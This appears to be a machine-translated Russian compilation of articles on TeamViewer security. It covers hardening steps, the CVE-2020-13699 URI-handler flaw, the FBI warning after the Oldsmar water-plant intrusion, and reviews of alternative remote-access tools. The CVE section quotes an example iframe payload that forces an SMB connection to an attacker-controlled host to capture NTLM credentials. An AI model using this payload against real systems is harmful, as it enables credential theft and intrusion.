1. Закройте Teamviewer, если он не используется. Не запускайте Teamviewer в фоновом режиме и открывайте его только тогда, когда это необходимо. Таким образом вы минимизируете риск взлома в случае, если программное обеспечение подвержено неизвестным уязвимостям.Убедитесь, что опция Start Teamviewer with System не отмечена в разделе Remote Control ;
2. Всегда обновляйте Teamviewer , чтобы иметь самые последние исправления безопасности для безопасного удаленного доступа;
3. Используйте надежные пароли , чтобы избежать взлома вашей учетной записи. Используйте эти советы, чтобы создавать надежные пароли и использовать менеджер паролей, например NordPass, для безопасного хранения ваших сложных паролей;
4. Используйте двухфакторную аутентификацию Teamviewer. Это создаст дополнительный барьер для хакеров, чтобы захватить вашу учетную запись. Для этого перейдите на https://login.teamviewer.com/ и войдите в свою учетную запись. Затем сайт автоматически предложит вам активировать его. Щелкните Активировать и следуйте дальнейшим инструкциям.
Вы также можете:
1. Щелкните свой профиль в правом верхнем углу;
2. Перейти на Изменить профиль ;
3. Перейдите к Общие и щелкните Активировать рядом с опцией Двухфакторная аутентификация .
5. Регулярно проверяйте, распознаете ли вы все доверенные устройства . Для этого:
1) Щелкните свой профиль в правом верхнем углу;
2) Перейти к Изменить профиль ;
3) Перейти к Доверенные устройства ;
4) Нажмите X рядом с подключением, которому вы не доверяете;
5) Щелкните Удалить .
Вы также должны сделать то же самое в разделе Active Logins , чтобы отозвать логины, которым вы не доверяете или не узнаете. Никогда не разрешайте запросы, которым вы не доверяете на 100%.
6. Используйте VPN. VPN зашифрует ваш трафик, и никакие хакеры или шпионы не смогут увидеть, что вы делаете, или перехватить ваши действия.
7. Отключите опцию легкого доступа. С помощью этой функции вы можете назначать устройства для подключения к учетной записи Teamviewer без паролей.Хотя это может показаться более удобным, но увеличивает вероятность взлома вашей учетной записи. Чтобы защитить себя, снимите отметку с опции Grant Easy Access в разделе Remote Control .
8. Включите черный и белый списки , чтобы разрешить только те соединения, которым вы доверяете. Для этого:
1) Щелкните Teamviewer в верхнем левом углу;
2) Выберите Настройки ;
3) Откройте настройки безопасности, перейдя в Безопасность ;
4) Щелкните Настройте рядом с Черный и белый список ;
5) Здесь вы можете разрешить и запретить доступ, добавляя и удаляя различные идентификаторы и партнеров.
Альтернативы Teamviewer
Если вы больше не хотите использовать Teamviewer, вам следует рассмотреть следующие альтернативы:
Slack — удобное приложение, широко используемое тысячами компаний. Это позволяет быстро и легко общаться друг с другом и делиться экранами;
Windows Remote Desktop — это простое в использовании и удобное программное обеспечение, доступное как для Windows, так и для macOS;
GoToMyPC — это простое и удобное программное обеспечение с основными функциями.Вы можете запускать его прямо из браузера и одновременно подключать несколько мониторов;
LogMeIn. Подобно GoToMyPC, он предлагает понятный интерфейс и простой пользовательский интерфейс, хотя его версия Max имеет немного меньше функций.
Оставайтесь в безопасности и конфиденциально с NordVPN. Попробуйте сейчас с 30-дневной гарантией возврата денег.
Уязвимость TeamViewer может быть использована для взлома пароля пользователя
Уязвимость с высоким уровнем риска (CVE-2020-13699) в TeamViewer для Windows может быть использована удаленными злоумышленниками для взлома пароля пользователя и, как следствие, приведет к дальнейшему использованию системы.
О TeamViewer
TeamViewer — это приложение, разработанное немецкой компанией TeamViewer GmbH и доступное для операционных систем Windows, macOS, Linux, Chrome OS, iOS, Android, Windows RT, Windows Phone 8 и BlackBerry.
Он используется в основном для удаленного доступа и управления различными типами компьютерных систем и мобильных устройств, но также предлагает функции совместной работы и презентации (например, совместное использование рабочего стола, веб-конференции, передача файлов и т. Д.)
С момента появления COVID-19 использование программного обеспечения на предприятиях увеличилось из-за того, что многие сотрудники были вынуждены работать из дома.
Об уязвимости (CVE-2020-13699)
CVE-2020-13699 — это слабое место в системе безопасности, возникающее из-за отсутствия кавычек в пути или элементе поиска — в частности, это связано с тем, что приложение неправильно цитирует свои пользовательские обработчики URI — и может быть использовано при посещении системы с установленной уязвимой версией TeamViewer злонамеренно созданный веб-сайт.
«Злоумышленник может встроить вредоносный iframe на веб-сайт с созданным URL-адресом ( iframe src = 'teamviewer10: --play \\ attacker-IP \ share \ fake.tvs' ), который запустит настольный клиент TeamViewer Windows и заставить его открыть удаленный общий ресурс SMB », — объяснил Джеффри Хофманн, инженер по безопасности из Praetorian, который обнаружил и ответственно раскрыл уязвимость.
«Windows выполнит аутентификацию NTLM при открытии общего ресурса SMB, и этот запрос может быть ретранслирован (с использованием такого инструмента, как респондент) для выполнения кода (или захвачен для взлома хэша).”
Как отмечалось ранее, использование уязвимости может быть инициировано удаленно и не требует предварительной аутентификации. Уязвимость кажется идеальной для целенаправленных атак на водопой.
Нет никаких указаний на то, что эта уязвимость эксплуатируется в «дикой природе», и в настоящее время нет общедоступных эксплойтов.
CIS оценивает риск эксплуатации как высокий для крупных и средних государственных и коммерческих структур, средний для малых государственных и коммерческих организаций и низкий для домашних пользователей.
По данным компании, уязвимость затрагивает TeamViewer версий с 8 по 15 (до 15.8.2) для платформы Windows. Пользователям рекомендуется перейти на версию 15.8.3, чтобы закрыть дыру.
После атаки Oldsmar ФБР предупреждает об использовании TeamViewer и Windows 7
Изображение: ZDNet
После инцидента в Oldsmar, когда неустановленный злоумышленник получил доступ к сети водоочистных сооружений и изменил дозировку химикатов до опасных уровней, ФБР во вторник разослало предупреждение, обратив внимание на три проблемы безопасности, которые были замечены на сеть завода после взлома на прошлой неделе.
Предупреждение, называемое Уведомлением частной отрасли или ПИН-кодом ФБР, предупреждает об использовании устаревших систем Windows 7, ненадежных паролей и программного обеспечения для совместного использования рабочего стола TeamViewer, призывая частные компании, федеральные и правительственные организации проверить внутренние сети. и политики доступа соответственно.
TeamViewer считал точку входа
PIN-код ФБР специально называет TeamViewer программным обеспечением для совместного использования рабочего стола, за которым нужно следить после того, как приложение было подтверждено как точка входа злоумышленника в сеть водоочистных сооружений Oldsmar.
Согласно сообщению Reuters, официальные лица заявили, что злоумышленник дважды подключался к компьютеру в сети водоочистной станции Oldsmar через TeamViewer в прошлую пятницу.
Во втором случае злоумышленник активно контролировал мышь оператора, перемещал ее по экрану и вносил изменения в уровни гидроксида натрия (щелочи), добавляемые в питьевую воду.
Оператор почти сразу отменил внесенные хакером изменения, но инцидент мгновенно стал предметом разногласий и дискуссий среди специалистов по безопасности.
Среди наиболее частых тем, поднимавшихся в онлайн-обсуждениях, было использование приложения TeamViewer для доступа к ресурсам критически важной инфраструктуры США.
В отчете Motherboard, опубликованном во вторник, несколько известных экспертов по безопасности раскритиковали компании и сотрудников, которые часто используют программное обеспечение для удаленной работы, назвав его небезопасным и неадекватным для управления конфиденциальными ресурсами.
Хотя предупреждение ФБР по PIN-коду не содержит критического тона или позиции по отношению к TeamViewer, ФБР хотело бы, чтобы организации федерального и частного секторов обратили внимание на приложение.
«Помимо законного использования, TeamViewer позволяет киберпреступникам осуществлять удаленный контроль над компьютерными системами и передавать файлы на компьютеры-жертвы, что делает его функционально похожим на троянов удаленного доступа (RAT)», — заявило ФБР.
«Тем не менее, законное использование TeamViewer делает аномальные действия менее подозрительными для конечных пользователей и системных администраторов по сравнению с обычными RAT.
В предупреждении ФБР организациям конкретно не говорится об удалении TeamViewer или любого другого программного обеспечения для совместного использования рабочего стола, но предупреждается, что TeamViewer и другое аналогичное программное обеспечение могут подвергаться злоупотреблениям, если злоумышленники получают доступ к учетным данным сотрудников или если учетные записи удаленного доступа (например, те, которые используются для доступа Windows RDP) защищены слабыми паролями.
ФБР предупреждает об использовании Windows 7 … снова
Кроме того, предупреждение ФБР также предупреждает о продолжении использования Windows 7, операционной системы, срок эксплуатации которой подошел к концу в прошлом году, 14 января 2020 года. Об этой проблеме ФБР также предупреждало американские компании в прошлом году.
Эта часть предупреждения была включена, потому что водоочистная станция Oldsmar все еще использовала системы Windows 7 в своей сети, согласно отчету правительства Массачусетса.
Хотя нет никаких доказательств того, что злоумышленники злоупотребляли ошибками, связанными с Windows 7, ФБР заявляет, что продолжать использовать старую операционную систему опасно, поскольку ОС не поддерживается и не получает обновлений безопасности, что в настоящее время оставляет многие системы уязвимыми для атак. через недавно обнаруженные уязвимости.
Однако отчет Cyberscoop, опубликованный сегодня, подчеркивает тот факт, что завод Oldsmar, как и многие другие водоочистные сооружения в США, часто недофинансируется и укомплектован персоналом.
Хотя ФБР предостерегает от использования Windows 7 по уважительным причинам, многие компании, федеральные и государственные агентства США могут быть не в состоянии что-либо с этим поделать, исключая серьезные финансовые вложения в модернизацию ИТ-инфраструктуры со стороны высшего руководства, что не является ожидается в ближайшее время во многих местах.
В этих случаях ФБР рекомендует ряд основных передовых методов обеспечения безопасности в качестве промежуточного способа смягчения угроз, например:
Использовать многофакторную аутентификацию;
Используйте надежные пароли для защиты учетных данных протокола удаленного рабочего стола (RDP);
Убедитесь, что антивирусные, спам-фильтры и брандмауэры обновлены, правильно настроены и безопасны;
Аудит сетевых конфигураций и изоляция компьютерных систем, которые не могут быть обновлены;
Проверьте свою сеть на наличие систем, использующих RDP, закрытия неиспользуемых портов RDP, применения двухфакторной аутентификации везде, где это возможно, и регистрации попыток входа в систему RDP;
Журналы аудита для всех протоколов удаленного подключения;
Обучить пользователей выявлять попытки социальной инженерии и сообщать о них;
Выявление и приостановка доступа пользователей, проявляющих необычную активность;
Следите за обновлениями программного обеспечения.
Безопасно ли использовать TeamViewer? Каковы его альтернативы?
TeamViewer — это быстрый и безопасный инструмент удаленного управления, предназначенный для помощи поставщикам управляемых ИТ-услуг в упреждающем мониторинге удаленных систем, клиентских конечных точек и сетей. Он может отслеживать такие устройства, как Windows, macOS и Linux, для раннего выявления проблем. Это помогает членам команды оставаться на связи из разных мест посредством онлайн-встреч. TeamViewer состоит из интуитивно понятного и простого в использовании интерфейса с мощными функциями удаленного доступа.
Помимо множества полезных функций, таких как идентификация автоматического доступа, пробуждение по локальной сети и назначение билетов, он имеет несколько ограничений с точки зрения безопасности, качества изображения и стоимости. На рынке доступно множество решений с расширенными функциями и лучшими коммуникационными возможностями. Прежде чем рассматривать альтернативы TeamViewer, давайте посмотрим, что делает TeamViewer по-прежнему предпочтительным для некоторых предприятий и менее ценным для тех, кто ищет более продвинутую систему удаленного управления.
Преимущества использования TeamViewer
Его можно легко установить и обновить
TeamViewer помогает группам обмениваться конфиденциальными файлами в разных местах
Он упрощает общение для удаленных команд с помощью функций видео, чата и голосовых вызовов
Его можно использовать на Android, Linux, Устройства BlackBerry Windows и Mac
TeamViewer предоставляется бесплатно для некоммерческих целей
Он помогает обеспечить легкий доступ к удаленным машинам
Помогает выявлять и выделять проблемы другим членам группы
Помогает членам группы проводить онлайн-тренинги до 25 участников одновременно
Это помогает увеличить потенциал продаж
Не требует конфигурации маршрутизатора
Команда может легко получить доступ к важным данным и приложениям в любое время и в любом месте с помощью TeamViewer
Он обеспечивает отличную поддержку клиентов
TeamViewer поддерживает удаленный доступ печать, удаленный чат и пробуждение по локальной сети без какой-либо конкретной конфигурации ции
С TeamViewer пользователи могут делиться своими экранами, окном приложения и всем рабочим столом
Это помогает с легкостью передавать файлы из онлайн-хранилищ, таких как OneDrive, Box и Google Drive
Предоставляет функцию перетаскивания для обмена файлы из одной системы в другую
Недостатки TeamViewer
TeamViewer не бесплатен для коммерческих целей и требует лицензии
Он не может обмениваться большими файлами
Он не работает через прокси-серверы
Для работы требуется быстрое непрерывное подключение к Интернету
Каждая система должна иметь TeamViewer и та же версия, установленная на нем, иначе она не будет работать
Машины доступны только тогда, когда они активны и доступны
5 Рекомендации по безопасности TeamViewer
По данным BBC, еще в 2016 году было взломано значительное количество учетных записей TeamViewer.Количество сообщений об атаках резко возросло, и хакеры использовали учетные данные либо из данных, украденных другими компаниями, либо из гигантских кешей. Из-за растущего числа атак TeamViewer был вынужден выпустить экстренное исправление для серьезной уязвимости в программе в декабре 2017 года. Этих причин было достаточно, чтобы дать TeamViewer отметку о небезопасном приложении. Хотя TeamViewer был разработан с учетом режима первого запуска и простоты использования по сравнению со сложными моделями безопасности, концепция не сработала так, как ожидалось.В то время как многие организации перешли на различные альтернативы TeamViewer, которые обещают предложить гораздо больше, компании и профессионалы, которые все еще используют TeamViewer, могут следовать некоторым передовым методам, чтобы защитить свои важные данные.
Запускать TeamViewer только тогда, когда это необходимо
Создавайте надежные пароли
Двухфакторная аутентификация
Обновите TeamViewer
Дополнительные параметры безопасности
1. Запускайте TeamViewer только тогда, когда это необходимо
Не идите на компромисс, когда дело касается защиты официальных данных.Немедленные действия могут помочь предотвратить нарушения безопасности и кражу данных. Не забудьте выйти из приложения, как только работа будет сделана, чтобы обеспечить безопасность ваших данных. Выход из приложения — лучший способ не дать доступ к машине кому-либо, обладающему способностями к взлому. Более того, продолжайте обновлять приложение с веб-сайта TeamViewer, пока он временно отключен, чтобы убедиться, что вы используете последнюю версию приложения с расширенными и новыми функциями.
2. Создайте надежные пароли
Создание надежных паролей помогает защитить вашу систему и важную информацию от уязвимостей.Для создания надежных паролей пользователям необходимо войти в консоль управления TeamViewer. Эта консоль помогает пользователям защитить свои учетные записи двумя способами: либо путем выбора варианта смены пароля (для установки надежных паролей), либо путем выбора двухфакторной аутентификации (добавляет дополнительные шаги к базовой процедуре входа в систему для обеспечения повышенной безопасности приложения). Пользователи могут устанавливать пароли с комбинацией специальных символов, букв и цифр.
3. Двухфакторная аутентификация
Двухфакторная аутентификация обеспечивает дополнительный уровень безопасности учетных записей TeamViewer.Он добавляет этап проверки вместе с идентификатором входа и паролем. Когда активирована двухфакторная аутентификация, пользователи получают уникальный код на свои сотовые телефоны вскоре после входа в систему с идентификатором и паролем. Однако по умолчанию двусторонняя аутентификация не применяется к реальному клиенту. Если учетная запись доступна для клиента с четырехзначным PIN-кодом, активация двусторонней проверки подлинности бесполезна, поэтому заблокируйте клиента для учетной записи, чтобы включить эффективную безопасность двусторонней проверки подлинности.
4.Обновите TeamViewer
Хотя TeamViewer обновляется автоматически, если он отключен или выключен, пользователь может использовать устаревшую версию приложения. Для таких сценариев они могут загрузить обновленную версию приложения, запустив приложение и выбрав основные этапы установки. Пользователей могут попросить ввести новый пароль для обновленной версии.
5. Дополнительные параметры безопасности
Расширенные параметры безопасности обеспечивают детальный контроль над функциями удаленного доступа TeamViewer.Этот тип повышенной безопасности обеспечивает широкий спектр детальных разрешений для сеансов удаленного доступа. Пользователи могут настроить эти параметры как «разрешить», «после подтверждения» или «отклонить в зависимости от требований». Однако мы советуем выбрать вкладку «после подтверждения», чтобы она запрашивала разрешения на доступ перед передачей файлов или установкой VPN-соединения.
Цены на модели TeamViewer
TeamViewer можно использовать в коммерческих и некоммерческих целях. Для некоммерческих целей инструмент является бесплатным, но для коммерческих целей можно выбрать один из трех различных вариантов: Бизнес, Премиум и Корпоративный.Эти версии TeamViewer включают базовые функции удаленного управления, включая передачу файлов, многоплатформенную поддержку, чат и удаленную поддержку необслуживаемых серверов с некоторыми отличиями. TeamViewer предлагает семидневную гарантию возврата денег при покупке.
Business: Эта версия, если она куплена, может быть установлена на одной рабочей станции. Чтобы установить его на другие рабочие станции, пользователям необходимо приобрести дополнительные установки. Каждая рабочая станция может запускать до трех одновременных сеансов.Версия Business считается одной из экономичных версий TeamViewer. Однако он включает меньше функций, чем Премиум и Корпоративный.
Premium: Версия TeamViewer Premium может быть установлена на неограниченное количество рабочих станций и может запускать до десяти одновременных сеансов с каждой рабочей станции. Эта версия включает в себя такие функции, как TeamViewer Manager, многоканальную маршрутизацию, TeamViewer Portable, веб-коннектор и пакет MSI.
Corporate: Корпоративная версия имеет все функции, предлагаемые TeamViewer.Каждая рабочая станция может проводить пятнадцать одновременных сеансов. Кроме того, до трех рабочих станций могут одновременно запускать одновременные сеансы. Пользователи корпоративной версии получают приоритетную поддержку от TeamViewer в течение одного года.
8 ЛУЧШИХ альтернатив TeamViewer
Несомненно, стоит упомянуть такие особенности TeamViewer, как его масштабируемость, простота использования, совместное использование экрана, отсутствие необходимости в дополнительных плагинах или программном обеспечении, совместимость с мобильными и настольными устройствами, встроенные записи совещаний, аудио- и видеозвонки и файлы. обмен.Однако из-за ранее упомянутых нарушений безопасности отдельные пользователи и корпорации ищут альтернативы TeamViewer. Некоторым нужны альтернативы TeamViewer для определенных операционных систем, таких как Windows или Mac, а другим нужны более продвинутые функции.
Существует множество программ, таких как TeamViewer, с аналогичными или более продвинутыми функциями, а также с большим упором на безопасность. Ниже описаны некоторые программные инструменты удаленного управления для поставщиков управляемых услуг, которые могут быть полезны корпорациям, которым требуется удаленное управление, и некоммерческим пользователям.
Dameware Remote Everywhere
Mikogo
Splashtop
Chrome Remote Desktop
VNC Connect
Webex Meetings
Join.me
Take Control
1. Dameware Remote Everywhere
SolarWinds ® Dameware ® Remote Everywhere — мощное облачное решение, предлагающее удаленное управление, простоту использования и гибкость. Это помогает организациям обеспечивать беспрепятственный, быстрый, контролируемый и автоматический доступ к удаленным устройствам.Он предлагает поддержку удаленного рабочего стола для различных операционных систем, включая Windows, macOS и Linux. С помощью этого инструмента администраторы могут добавлять пользователей, управлять разрешениями и предоставлять доступ через инструмент управления Active Directory. Инструмент может перезагружать систему в спящем или спящем режиме и может использоваться для удаленного управления клиентами, организации онлайн-встреч, онлайн-чата с командами и конечными пользователями, а также создания снимков экрана удаленных устройств одним щелчком мыши. SolarWinds Dameware Remote Everywhere позволяет пользователям:
Мониторинг и запись сеансов в режиме реального времени
Выгрузка данных в облако
Массовое развертывание агентов на машины
Регулировка качества и цвета сеанса в соответствии с требованиями пользователя для полосы пропускания от высокой до низкой
Управление несколькими устройствами на Mac , платформы iOS, Windows, Linux и Android
Обеспечивает безопасное соединение с двухфакторной аутентификацией, многоуровневой аутентификацией, шифрованием AES 256 и генерацией контактов для конкретного сеанса
SolarWinds Dameware быстро устанавливает активные сеансы и помогает обеспечивать безопасность данных пользователей с помощью расширенных протоколов шифрования и поддержки (многоуровневый разрешительный доступ и двухфакторная аутентификация).Используя SolarWinds Dameware, пользователи могут быстро подключаться к машинам, не отвечающим на запросы, с помощью AMT, wake-on-LAN и поддержки KVM. В случае возникновения ошибок администраторы могут устранить их, не беспокоя других пользователей за их данные для входа и информацию о системе. Инструмент предоставляет всю информацию, включая BIOS, журналы событий и обновления. Он также сохраняет сведения о каждом активном сеансе в виде заметок, журналов, снимков экрана и записей вскоре после его завершения. Это помогает предоставить ценную информацию для устранения ошибок.Инструмент предлагает предсессионный или внутрисессионный чат, видео и голосовые конференции и использует VoIP.
2. Микого
Источник: https://www.mikogo.com/
Mikogo — это надежная альтернатива TeamViewer, доступная напрямую в браузере через устройства Android, Mac, Windows, Linux и iPhone, и не требует процедур загрузки и установки. Эта облачная программа просмотра HTML может одновременно подключать к одному компьютеру до двадцати пяти пользователей. Администраторы или пользователи с доступом к элементам управления могут при необходимости менять роли и управлять удаленными машинами.Инструмент имеет функцию передачи данных для обмена конфиденциальной информацией между участниками. Mikogo включает стандартные функции, которые должен иметь инструмент удаленного управления, такие как возможность записи сеансов, функции чата, интерактивная доска и совместное использование экрана. Его бесплатные функции совместного использования экрана позволяют пользователям просматривать, совместно использовать и управлять рабочими столами других участников. Эта функция помогает отображать прямые трансляции, демонстрации онлайн-продаж, обучающие группы и веб-конференции. Кроме того, инструмент предлагает 14-дневную бесплатную демонстрационную версию для одного пользователя за сеанс.
3. Splashtop
Источник: https://www.pcmag.com/
Splashtop — это решение для удаленного рабочего стола, которое помогает обеспечить удаленный доступ к приложениям, проектам, файлам и обучению. Решение доступно на таких устройствах, как смартфоны, настольные компьютеры, Linux, Windows и macOS. Пользователи и корпорации могут выбирать продукты Splashtop в соответствии со своими текущими требованиями. Версия также может быть обновлена при необходимости. Однако пользователям может потребоваться доплатить за дополнительные функции, поскольку разные продукты Splashtop различаются по функциям и моделям ценообразования.Splashtop Personal — отличная альтернатива TeamViewer, поскольку он бесплатный и обеспечивает доступ к пяти устройствам, подключенным к локальной сети. Эта версия может использоваться только в некоммерческих целях.
Для бизнес-целей Splashtop Business предлагает возможности удаленного управления. Эта платная версия Splashtop предоставляет пользователям дополнительные функции, такие как передача файлов, доступ к локальным принтерам и возможность общаться в чате с другими удаленными участниками. Он также предлагает встроенную функцию TLS-зашифрованных (256-битных) соединений для обеспечения высокой стабильности и производительности при удаленном взаимодействии с командами.Splashtop Classroom и Mirroring360 — это обновленные и расширенные версии Splashtop с функциями совместного использования экрана, которые помогают пользователям делиться своим контентом, идеями, приложениями, рабочим столом и многим другим без необходимости во внешних плагинах или оборудовании.
4. Удаленный рабочий стол Chrome
Источник: https://www.youtube.com/
Chrome Remote Desktop — популярное бесплатное приложение для удаленного доступа. Его легко настроить и использовать, он обеспечивает стабильное соединение между удаленными машинами.Однако пользователям необходимо расширение Google Chrome, чтобы использовать приложение наилучшим образом. Это помогает управлять удаленными компьютерами с хорошим подключением к Интернету. Приложение быстро работает на устройствах, платформах и браузерах, на которых работают гиганты поисковых систем. На удаленном рабочем столе Chrome есть специальные приложения для устройств iOS и Android, которые помогают удаленно управлять компьютерами. Требуется разрешение на доступ к удаленным компьютерам. Хост удаленного рабочего стола Chrome автоматически загружается для обмена данными.Удаленный рабочий стол Chrome не поддерживает такие функции, как совместное использование экрана, чаты, видеоконференции и т. Д. Его можно использовать только для управления удаленными компьютерами и обмена файлами.
5. VNC Connect
Источник: https://www.pcmag.com/
RealVNC — это программное обеспечение удаленного доступа для коммерческого и личного использования. Он имеет несколько преимуществ перед TeamViewer с точки зрения возможностей совместного использования, безопасности, гибкости и стоимости. Это безопасное и надежное приложение помогает защитить удаленные онлайн-сеансы, шифруя их с помощью 128-битного AES, сложных настроек пароля и двухфакторной аутентификации.VNC Connect включает лицензированное серверное приложение для удаленного управления машинами и приложение VNC Viewer, которое можно загрузить бесплатно. Пользователям также необходимо создать учетные записи на RealVNC для управления подписками и предоставления разрешений другим пользователям или командам. Оба приложения VNC (сервер и средство просмотра) не требуют настройки брандмауэра или маршрутизатора и автоматически обнаруживаются через Интернет.
У инструмента есть как платная, так и бесплатная версия. Однако пользователям необходимо пойти на компромисс с функциями, если они выберут бесплатную версию VNC Connect.Платные версии Professional и Enterprise могут контролировать или управлять неограниченным количеством удаленных компьютеров. Они также включают дополнительные функции, такие как передача данных, удаленная печать или возможность общения в чате. Версия VNC Connect для предприятий может шифровать сеансы с помощью 256-битного AES. Он также может включать прямые удаленные соединения с удаленными машинами, что означает, что удаленно расположенные устройства могут подключаться без необходимости подключения к Интернету. Функции веб-конференции недоступны ни в одной из версий.
Простота развертывания
Подключает всю экосистему
Предварительная установка или подключение по запросу
Детализированный контроль доступа
Многофакторная аутентификация
Отзывчивый и интуитивно понятный
Прямое и облачное подключение
Не требует обучения
Обслуживаемый и автоматический доступ
6. Webex Meetings
Источник: https://win10fix.com/
Cisco приобрела Webex Communications в 2007 году и с тех пор занимается разработкой и распространением программных решений для совместной работы в компаниях.Webex Meetings — это удаленное решение, помогающее организациям и отдельным пользователям проводить удаленные сеансы, онлайн-обучение и многое другое. Он ориентирован на веб-конференции, голосовые вызовы и чаты. Однако удаленные онлайн-сеансы с совещаний Webex можно выполнять только через облако Cisco Webex Cloud, как и в других продуктах Webex. Облако Webex распространяется по всему миру в центрах обработки данных вместе с концепциями резервного копирования и кэширования. Облако и решение помогают обеспечить максимальную пропускную способность и доступность для пользователей.
Встречи
WebEx доступны в платной и бесплатной версиях. В бесплатной версии авторизованные пользователи могут проводить бесплатные онлайн-встречи с двумя другими участниками. Чтобы добавить больше людей и использовать дополнительные функции Webex Meetings, доступны премиальные пакеты с расширенными и обновленными функциями. Пользователи могут проводить веб-конференции, добавлять до 100 участников в онлайн-собрания и конференции, получать доступ к различным параметрам совместного использования экрана, удаленный доступ к системам, защищать собрания с помощью паролей и создавать определенные профили пользователей.
7. Join.me
Источник: https://www.pcmag.com/
Join.me — это веб-инструмент, который помогает в организации онлайн-встреч. Сервис предлагает администраторам дополнительное пространство для планирования и проведения онлайн-встреч. Все сеансы автоматически записываются для использования в будущем и для отслеживания того, кто чем занимается. С его бесплатной версией пользователи могут легко организовывать онлайн-собрания до десяти участников и видеоконференции до пяти участников. Однако вы должны загрузить приложение и зарегистрироваться, прежде чем использовать все его функции.Помимо функций VolP, видеоконференцсвязи и общения в чате, сервис также обеспечивает совместное использование данных и демонстрацию экрана. Модули подписки на Join.me содержат дополнительные возможности администрирования и функции повышения продуктивности (PRO), с помощью которых вы можете позволить до 250 участников принять участие в собрании. Кроме того, сервисы предлагают плагины для Outlook и Google, а также доски.
8. Взять под контроль
Take Control является частью семейства продуктов N -able и разработан специально для использования поставщиками управляемых услуг (MSP).Это означает, что он создан, чтобы помочь вам оказывать удаленную поддержку сотням или даже тысячам клиентов — быстро и безопасно.
С Take Control вы получаете доступ к удобной панели управления, где ваша ИТ-команда может просматривать всю необходимую диагностику. Он может подключаться к устройствам клиентов за считанные секунды, что позволяет им сразу же получить необходимую помощь (и не тратить зря ваше время).
Это решение также предназначено для обеспечения безопасности, защиты ваших клиентов с помощью расширенных протоколов шифрования, двухфакторной аутентификации (2FA), поддержки многоуровневых разрешений и многого другого.Это также гибко настраиваемая опция, позволяющая создавать рабочие процессы и отчеты, настроенные в соответствии с вашими конкретными потребностями.
Как принять обоснованное решение
Из-за огромного количества альтернатив TeamViewer сделать выбор — непросто. Перед принятием решения администраторам необходимо учитывать уникальные особенности организации, такие как требования, бюджет, необходимые функции и количество одновременных сеансов. Если организации требуется решение с широкими возможностями, надежной безопасностью и основными функциями, такими как передача данных и веб-конференции, настоятельно рекомендуется использовать SolarWinds Dameware Remote Everywhere.Он включает в себя больше функций, интуитивно понятный пользовательский интерфейс, консоль управления и записи сеансов, которые помогают пользователям с легкостью устранять ошибки.
Прежде чем покупать какой-либо конкретный инструмент, задайте следующие вопросы:
Является ли решение ценным и стоит ли денег, которые вы платите?
Какую поддержку они предлагают для исправления ошибок?
Как часто они отправляют обновления?
Можете ли вы настроить решение в соответствии со своими потребностями?
Какую защиту обеспечивает программное обеспечение?
Ответы на эти вопросы помогут вам принять обоснованное решение и упростить процесс удаленного управления.